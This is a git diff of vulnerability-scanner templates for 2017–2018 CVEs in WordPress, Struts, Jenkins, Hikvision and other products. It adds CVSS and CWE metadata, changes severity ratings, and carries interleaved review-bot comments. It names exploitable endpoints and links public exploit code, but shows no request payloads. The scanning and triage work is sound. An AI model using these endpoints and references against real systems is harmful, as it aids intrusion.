+++ b/cves/2017/CVE-2017-5487.yaml
@@ -3,12 +3,17 @@ id: CVE-2017-5487
 info:
 name: WordPress Core < 4.7.1 - Username Enumeration
 author: Manas_Harsh,daffainfo,geeknik
- severity: info
+ severity: medium
 description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
 tags: cve,cve2017,wordpress
 reference:
 - https://nvd.nist.gov/vuln/detail/CVE-2017-5487
 - https://www.exploit-db.com/exploits/41497
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.30
+ cve-id: CVE-2017-5487
+ cwe-id: CWE-200
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-5521.yaml b/cves/2017/CVE-2017-5521.yaml
index 3421006395..7c792b2225 100644
--- a/cves/2017/CVE-2017-5521.yaml
+++ b/cves/2017/CVE-2017-5521.yaml
@@ -2,12 +2,17 @@ id: CVE-2017-5521
 info:
 name: Bypassing Authentication on NETGEAR Routers
 author: princechaddha
- severity: medium
+ severity: high
 description: An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices.They are prone to password disclosure via simple crafted requests to the web management server.
 reference:
 - https://www.cvedetails.com/cve/CVE-2017-5521/
 - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
 tags: cve,cve2017,auth-bypass
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.10
+ cve-id: CVE-2017-5521
+ cwe-id: CWE-200
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml
index ad22c9704a..0d112f3194 100644
--- a/cves/2017/CVE-2017-5638.yaml
+++ b/cves/2017/CVE-2017-5638.yaml
@@ -6,6 +6,11 @@ info:
 description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
 tags: cve,cve2017,struts,rce,apache
 reference: https://github.com/mazen160/struts-pwn
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10.00
+ cve-id: CVE-2017-5638
+ cwe-id: CWE-20
 requests:
 - raw:
diff --git a/cves/2017/CVE-2017-6090.yaml b/cves/2017/CVE-2017-6090.yaml
index f9c76aab23..38352df854 100644
--- a/cves/2017/CVE-2017-6090.yaml
+++ b/cves/2017/CVE-2017-6090.yaml
@@ -3,9 +3,15 @@ id: CVE-2017-6090
 info:
 name: PhpCollab (unauthenticated) Arbitrary File Upload
 author: pikpikcu
- severity: critical
+ severity: high
 tags: cve,cve2017,phpcollab,rce,fileupload
 reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.80
+ cve-id: CVE-2017-6090
+ cwe-id: CWE-434
+ description: "Unrestricted file upload vulnerability in clients/editclient.php in PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/."
 requests:
 - raw:
diff --git a/cves/2017/CVE-2017-7269.yaml b/cves/2017/CVE-2017-7269.yaml
index 82e8e080d4..533586dd4f 100644
--- a/cves/2017/CVE-2017-7269.yaml
+++ b/cves/2017/CVE-2017-7269.yaml
@@ -9,6 +9,11 @@ info:
 - https://blog.0patch.com/2017/03/0patching-immortal-cve-2017-7269.html
 - https://github.com/danigargu/explodingcan/blob/master/explodingcan.py
 tags: cve,cve2017,rce
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2017-7269
+ cwe-id: CWE-119
 requests:
 - method: OPTIONS
diff --git a/cves/2017/CVE-2017-7391.yaml b/cves/2017/CVE-2017-7391.yaml
index a3ebfb4f8d..b17e18d01d 100644
--- a/cves/2017/CVE-2017-7391.yaml
+++ b/cves/2017/CVE-2017-7391.yaml
@@ -9,6 +9,11 @@ info:
 reference:
 - https://github.com/dweeves/magmi-git/issues/522
 - https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2017-7391
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-7615.yaml b/cves/2017/CVE-2017-7615.yaml
index de43a2eddc..cadec418f8 100644
--- a/cves/2017/CVE-2017-7615.yaml
+++ b/cves/2017/CVE-2017-7615.yaml
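Review bot: The added `description` for CVE-2017-6090 says "remote authenticated users" and the added vector carries `PR:L`, yet the `name` a few lines above still reads "PhpCollab (unauthenticated) Arbitrary File Upload", so the template's own metadata now disagrees about whether authentication is required. If the check implemented below the hunk genuinely works pre-auth, say so in the description; otherwise drop the qualifier from the name, e.g. `name: PhpCollab Arbitrary File Upload`. The `requests:` block starts outside the hunk, so I could not verify which of the two is correct from this view.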
@@ -15,6 +15,11 @@ info:
 - https://sourceforge.net/projects/mantisbt/files/mantis-stable/
 - http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt
 - https://www.exploit-db.com/exploits/41890
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.80
+ cve-id: CVE-2017-7615
+ cwe-id: CWE-640
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-7921.yaml b/cves/2017/CVE-2017-7921.yaml
index d3dde0e997..5a1fbdfe03 100644
--- a/cves/2017/CVE-2017-7921.yaml
+++ b/cves/2017/CVE-2017-7921.yaml
@@ -2,12 +2,17 @@ id: CVE-2017-7921
 info:
 name: Hikvision Authentication Bypass
 author: princechaddha
- severity: high
+ severity: critical
 description: An Improper Authentication issue was discovered in Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.
 reference:
 - http://www.hikvision.com/us/about_10805.html
 - https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01
 tags: cve,cve2017,auth-bypass
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10.00
+ cve-id: CVE-2017-7921
+ cwe-id: CWE-287
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-8917.yaml b/cves/2017/CVE-2017-8917.yaml
index ccad58de39..a4968604e8 100644
--- a/cves/2017/CVE-2017-8917.yaml
+++ b/cves/2017/CVE-2017-8917.yaml
@@ -2,10 +2,15 @@ id: CVE-2017-8917
 info:
 name: Joomla SQL Injection
 author: princechaddha
- severity: high
+ severity: critical
 description: SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers to execute arbitrary SQL commands via unspecified vectors.
 reference: https://www.cvedetails.com/cve/CVE-2017-8917/
 tags: cve,cve2017,joomla,sqli
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2017-8917
+ cwe-id: CWE-89
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-9140.yaml b/cves/2017/CVE-2017-9140.yaml
index cbd278de96..365d6c0957 100644
--- a/cves/2017/CVE-2017-9140.yaml
+++ b/cves/2017/CVE-2017-9140.yaml
@@ -7,6 +7,11 @@ info:
 tags: cve,cve2017,xss,telerik
 description: Cross-site scripting (XSS) vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.
 reference: https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2017-9140
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-9288.yaml b/cves/2017/CVE-2017-9288.yaml
index da92a85868..843b3c84d2 100644
--- a/cves/2017/CVE-2017-9288.yaml
+++ b/cves/2017/CVE-2017-9288.yaml
@@ -7,6 +7,11 @@ info:
 description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter).
 reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288
 tags: cve,cve2017,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2017-9288
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2017/CVE-2017-9506.yaml b/cves/2017/CVE-2017-9506.yaml
index 30ca442da3..d97ed4f5c8 100644
--- a/cves/2017/CVE-2017-9506.yaml
+++ b/cves/2017/CVE-2017-9506.yaml
@@ -3,13 +3,18 @@ id: CVE-2017-9506
 info:
 name: Jira IconURIServlet SSRF
 author: pdteam
- severity: high
+ severity: medium
 description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
 reference:
 - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html
 - https://ecosystem.atlassian.net/browse/OAUTH-344
 - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3
 tags: cve,cve2017,atlassian,jira,ssrf,oob
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2017-9506
+ cwe-id: CWE-918
 requests:
 - raw:
diff --git a/cves/2017/CVE-2017-9791.yaml b/cves/2017/CVE-2017-9791.yaml
index 0b2bfa1813..a7acef344d 100644
--- a/cves/2017/CVE-2017-9791.yaml
+++ b/cves/2017/CVE-2017-9791.yaml
@@ -9,6 +9,11 @@ info:
 - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html
 - http://struts.apache.org/docs/s2-048.html
 tags: cve,cve2017,apache,rce
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2017-9791
+ cwe-id: CWE-20
 requests:
 - method: POST
diff --git a/cves/2017/CVE-2017-9805.yaml b/cves/2017/CVE-2017-9805.yaml
index 008a0df385..3fbcb5b5e2 100644
--- a/cves/2017/CVE-2017-9805.yaml
+++ b/cves/2017/CVE-2017-9805.yaml
@@ -3,12 +3,17 @@ id: CVE-2017-9805
 info:
 name: Apache Struts2 S2-052 RCE
 author: pikpikcu
- severity: critical
+ severity: high
 description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.
 reference:
 - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html
 - https://struts.apache.org/docs/s2-052.html
 tags: cve,cve2017,apache,rce,struts
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.10
+ cve-id: CVE-2017-9805
+ cwe-id: CWE-502
 requests:
 - method: POST
diff --git a/cves/2017/CVE-2017-9822.yaml b/cves/2017/CVE-2017-9822.yaml
index c2ae610bf1..10a07fec84 100644
--- a/cves/2017/CVE-2017-9822.yaml
+++ b/cves/2017/CVE-2017-9822.yaml
@@ -7,6 +7,11 @@ info:
 description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected to deserialization vulnerability that leads to Remote Code Execution (RCE)
 tags: cve,cve2017,dotnetnuke,bypass
 reference: https://github.com/murataydemir/CVE-2017-9822
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.80
+ cve-id: CVE-2017-9822
+ cwe-id: CWE-20
 requests:
 - raw:
diff --git a/cves/2017/CVE-2017-9841.yaml b/cves/2017/CVE-2017-9841.yaml
index 0a1de31159..bb1e917308 100644
--- a/cves/2017/CVE-2017-9841.yaml
+++ b/cves/2017/CVE-2017-9841.yaml
@@ -3,7 +3,7 @@ id: CVE-2017-9841
 info:
 name: CVE-2017-9841
 author: Random_Robbie,pikpikcu
- severity: high
+ severity: critical
 description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI
 tags: cve,cve2017,php,phpunit,rce
 reference:
@@ -11,6 +11,11 @@ info:
 - https://github.com/RandomRobbieBF/phpunit-brute
 - https://thephp.cc/articles/phpunit-a-security-risk
 - https://twitter.com/sec715/status/1411517028012158976
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2017-9841
+ cwe-id: CWE-94
 requests:
diff --git a/cves/2018/CVE-2018-0296.yaml b/cves/2018/CVE-2018-0296.yaml
index 0aec140f4e..2bc87caa63 100644
--- a/cves/2018/CVE-2018-0296.yaml
+++ b/cves/2018/CVE-2018-0296.yaml
@@ -3,9 +3,15 @@ id: CVE-2018-0296
 info:
 name: Cisco ASA path traversal vulnerability
 author: organiccrap
- severity: medium
+ severity: high
 tags: cve,cve2018,cisco,lfi
 reference: https://github.com/yassineaboukir/CVE-2018-0296
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+ cvss-score: 7.50
+ cve-id: CVE-2018-0296
+ cwe-id: CWE-22
+ description: "A vulnerability in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory traversal techniques. The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic. This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products: 3000 Series Industrial Security Appliance (ISA), ASA 1000V Cloud Firewall, ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security Appliance, Firepower 4100 Series Security Appliance, Firepower 9300 ASA Security Module, FTD Virtual (FTDv). Cisco Bug IDs: CSCvi16029."
 requests:
 - method: GET
diff --git a/cves/2018/CVE-2018-1000129.yaml b/cves/2018/CVE-2018-1000129.yaml
index 7e1a3a440a..9fc6a43150 100644
--- a/cves/2018/CVE-2018-1000129.yaml
+++ b/cves/2018/CVE-2018-1000129.yaml
@@ -3,9 +3,19 @@ id: CVE-2018-1000129
 info:
 name: Jolokia XSS
 author: mavericknerd,0h1in9e
- severity: high
+ severity: medium
 description: An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP servlet that allows an attacker to execute malicious javascript in the victim's browser.
 tags: cve,cve2018,jolokia,xss
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2018-1000129
+ cwe-id: CWE-79
+ reference:
+ - https://jolokia.org/#Security_fixes_with_1.5.0
+ - https://github.com/rhuss/jolokia/commit/5895d5c137c335e6b473e9dcb9baf748851bbc5f#diff-f19898247eddb55de6400489bff748ad
+ - https://access.redhat.com/errata/RHSA-2018:2669
+ - https://access.redhat.com/errata/RHSA-2018:3817
 requests:
 - method: GET
diff --git a/cves/2018/CVE-2018-1000130.yaml b/cves/2018/CVE-2018-1000130.yaml
index 961e31302a..9421966f6e 100644
--- a/cves/2018/CVE-2018-1000130.yaml
+++ b/cves/2018/CVE-2018-1000130.yaml
@@ -6,6 +6,14 @@ info:
 severity: high
 description: A JNDI Injection vulnerability exists in Jolokia agent in the proxy mode that allows a remote attacker to run arbitrary Java code on the server.
 tags: cve,cve2018,jolokia,rce
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.10
+ cve-id: CVE-2018-1000130
+ cwe-id: CWE-74
+ reference:
+ - https://jolokia.org/#Security_fixes_with_1.5.0
+ - https://access.redhat.com/errata/RHSA-2018:2669
 requests:
 - raw:
diff --git a/cves/2018/CVE-2018-1000533.yaml b/cves/2018/CVE-2018-1000533.yaml
index 4591ccbbf3..7532d878ce 100644
--- a/cves/2018/CVE-2018-1000533.yaml
+++ b/cves/2018/CVE-2018-1000533.yaml
@@ -7,6 +7,11 @@ info:
 description: klaussilveira GitList version <= 0.6 contains a Passing incorrectly sanitized input to system function vulnerability in `searchTree` function that can result in Execute any code as PHP user.
 reference: https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533
 tags: rce,git,cve,cve2018,gitlist
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2018-1000533
+ cwe-id: CWE-20
 requests:
 - raw:
diff --git a/cves/2018/CVE-2018-1000600.yaml b/cves/2018/CVE-2018-1000600.yaml
index 5b5e68d0d7..b244248f80 100644
--- a/cves/2018/CVE-2018-1000600.yaml
+++ b/cves/2018/CVE-2018-1000600.yaml
@@ -7,8 +7,13 @@ info:
 - https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915
 - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
 author: geeknik
- severity: medium
+ severity: high
 tags: cve,cve2018,jenkins,ssrf,oob
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+ cvss-score: 8.80
+ cve-id: CVE-2018-1000600
+ cwe-id: CWE-200
 requests:
 - method: GET
diff --git a/cves/2018/CVE-2018-1000861.yaml b/cves/2018/CVE-2018-1000861.yaml
index 27841387a4..5dbeddcdaa 100644
--- a/cves/2018/CVE-2018-1000861.yaml
+++ b/cves/2018/CVE-2018-1000861.yaml
@@ -6,6 +6,12 @@ info:
 severity: critical
 reference: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861
 tags: cve,cve2018,jenkin,rce
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2018-1000861
+ cwe-id: CWE-502
+ description: "A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier in stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way."
 requests:
 - method: GET
diff --git a/cves/2018/CVE-2018-10095.yaml b/cves/2018/CVE-2018-10095.yaml
index 99d22365ce..7c1ad45220 100644
--- a/cves/2018/CVE-2018-10095.yaml
+++ b/cves/2018/CVE-2018-10095.yaml
@@ -8,6 +8,11 @@ info:
 Cross-site scripting (XSS) vulnerability in Dolibarr before 7.0.2 allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php.
 reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10095
 tags: cve,cve2018,xss,dolibarr
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2018-10095
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2018/CVE-2018-10141.yaml b/cves/2018/CVE-2018-10141.yaml
index 0c21319c5d..fe677ff879 100644
--- a/cves/2018/CVE-2018-10141.yaml
+++ b/cves/2018/CVE-2018-10141.yaml
@@ -7,6 +7,11 @@ info:
 severity: medium
 reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10141
 tags: globalprotect,xss,cve,cve2018,vpn
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2018-10141
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2018/CVE-2018-10822.yaml b/cves/2018/CVE-2018-10822.yaml
index 572d3db315..d93affb5d4 100644
--- a/cves/2018/CVE-2018-10822.yaml
+++ b/cves/2018/CVE-2018-10822.yaml
@@ -9,6 +9,11 @@ info:
 - https://www.exploit-db.com/exploits/45678
 - https://nvd.nist.gov/vuln/detail/CVE-2018-10822
 tags: cve,cve2018,lfi,router,dlink
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2018-10822
+ cwe-id: CWE-22
 requests:
 - method: GET
diff --git a/cves/2018/CVE-2018-11409.yaml b/cves/2018/CVE-2018-11409.yaml
index 3825c9357d..888187304c 100644
--- a/cves/2018/CVE-2018-11409.yaml
+++ b/cves/2018/CVE-2018-11409.yaml
@@ -6,6 +6,12 @@ info:
 severity: medium
 reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11409
 tags: cve,cve2018,splunk
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.30
+ cve-id: CVE-2018-11409
+ cwe-id: CWE-200
+ description: "Splunk through 7.0.1 allows information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key."
 requests:
 - method: GET
diff --git a/cves/2018/CVE-2018-11709.yaml b/cves/2018/CVE-2018-11709.yaml
index b71a5826b6..a5c31e20e5 100644
--- a/cves/2018/CVE-2018-11709.yaml
+++ b/cves/2018/CVE-2018-11709.yaml
@@ -7,6 +7,11 @@ info:
 description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI.
 reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709
 tags: cve,cve2018,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2018-11709
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2018/CVE-2018-11759.yaml b/cves/2018/CVE-2018-11759.yaml
index edf69a2714..124b5bd839 100644
--- a/cves/2018/CVE-2018-11759.yaml
+++ b/cves/2018/CVE-2018-11759.yaml
@@ -3,9 +3,15 @@ id: CVE-2018-11759
 info:
 name: Apache Tomcat JK Status Manager Access
 author: harshbothra_
- severity: medium
+ severity: high
 reference: https://github.com/immunIT/CVE-2018-11759
 tags: cve,cve2018,apache
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2018-11759
+ cwe-id: CWE-22
+ description: "The Apache Web Server (httpd) specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 did not handle some edge cases correctly. If only a sub-set of the URLs supported by Tomcat were exposed via httpd, then it was possible for a specially constructed request to expose application functionality through the reverse proxy that was not intended for clients accessing the application via the reverse proxy. It was also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical."
 requests:
 - method: GET
diff --git a/cves/2018/CVE-2018-11776.yaml b/cves/2018/CVE-2018-11776.yaml
index ef2fb19d90..98bff06e5c 100644
--- a/cves/2018/CVE-2018-11776.yaml
+++ b/cves/2018/CVE-2018-11776.yaml
@@ -3,9 +3,15 @@ id: CVE-2018-11776 info: name: Apache Struts2 S2-057 RCE author: pikpikcu - severity: critical + severity: high reference: https://github.com/jas502n/St2-057 tags: cve,cve2018,apache,rce,struts + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2018-11776 + cwe-id: CWE-20 + description: "Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace." requests: - method: GET diff --git a/cves/2018/CVE-2018-11784.yaml b/cves/2018/CVE-2018-11784.yaml index 65862adf48..ec8276c693 100644 --- a/cves/2018/CVE-2018-11784.yaml +++ b/cves/2018/CVE-2018-11784.yaml @@ -7,6 +7,11 @@ info: reference: https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E severity: medium tags: tomcat,redirect,cve,cve2018 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.30 + cve-id: CVE-2018-11784 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2018/CVE-2018-12031.yaml b/cves/2018/CVE-2018-12031.yaml index 35dcc2c5d4..f5ecf6d832 100644 --- a/cves/2018/CVE-2018-12031.yaml +++ b/cves/2018/CVE-2018-12031.yaml 
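Review bot: `severity` drops from critical to high for CVE-2018-11776, an unauthenticated Struts RCE with a public reference already on the template, and nothing in the template records why. The new value matches the CVSS 3.0 qualitative band for the added `cvss-score: 8.10` (AC:H keeps it below 9.0), and the CVE-2018-12613 and CVE-2018-1335 hunks make the same downgrade, so this looks like a deliberate policy of deriving `severity` from `cvss-score`. An inline comment on the changed line such as `severity: high  # derived from classification.cvss-score` or a sentence in the commit message would stop the next contributor from bumping it back to critical.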
@@ -3,13 +3,18 @@ id: CVE-2018-12031 info: name: Eaton Intelligent Power Manager 1.6 - Directory Traversal author: daffainfo - severity: high + severity: critical description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution. reference: - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion - https://nvd.nist.gov/vuln/detail/CVE-2018-12031 - https://www.exploit-db.com/exploits/48614 tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-12031 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-1207.yaml b/cves/2018/CVE-2018-1207.yaml index b7b8cecbc5..2d01313840 100644 --- a/cves/2018/CVE-2018-1207.yaml +++ b/cves/2018/CVE-2018-1207.yaml @@ -14,6 +14,11 @@ info: https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py tags: cve,cve2018,dell,injection,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-1207 + cwe-id: CWE-94 requests: - method: GET diff --git a/cves/2018/CVE-2018-12095.yaml b/cves/2018/CVE-2018-12095.yaml index eb04127534..202b897b33 100644 --- a/cves/2018/CVE-2018-12095.yaml +++ b/cves/2018/CVE-2018-12095.yaml @@ -10,6 +10,11 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095 - https://cxsecurity.com/issue/WLB-2018060092 tags: cve,cve2018,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.40 + cve-id: CVE-2018-12095 + cwe-id: CWE-79 requests: - method: GET diff --git 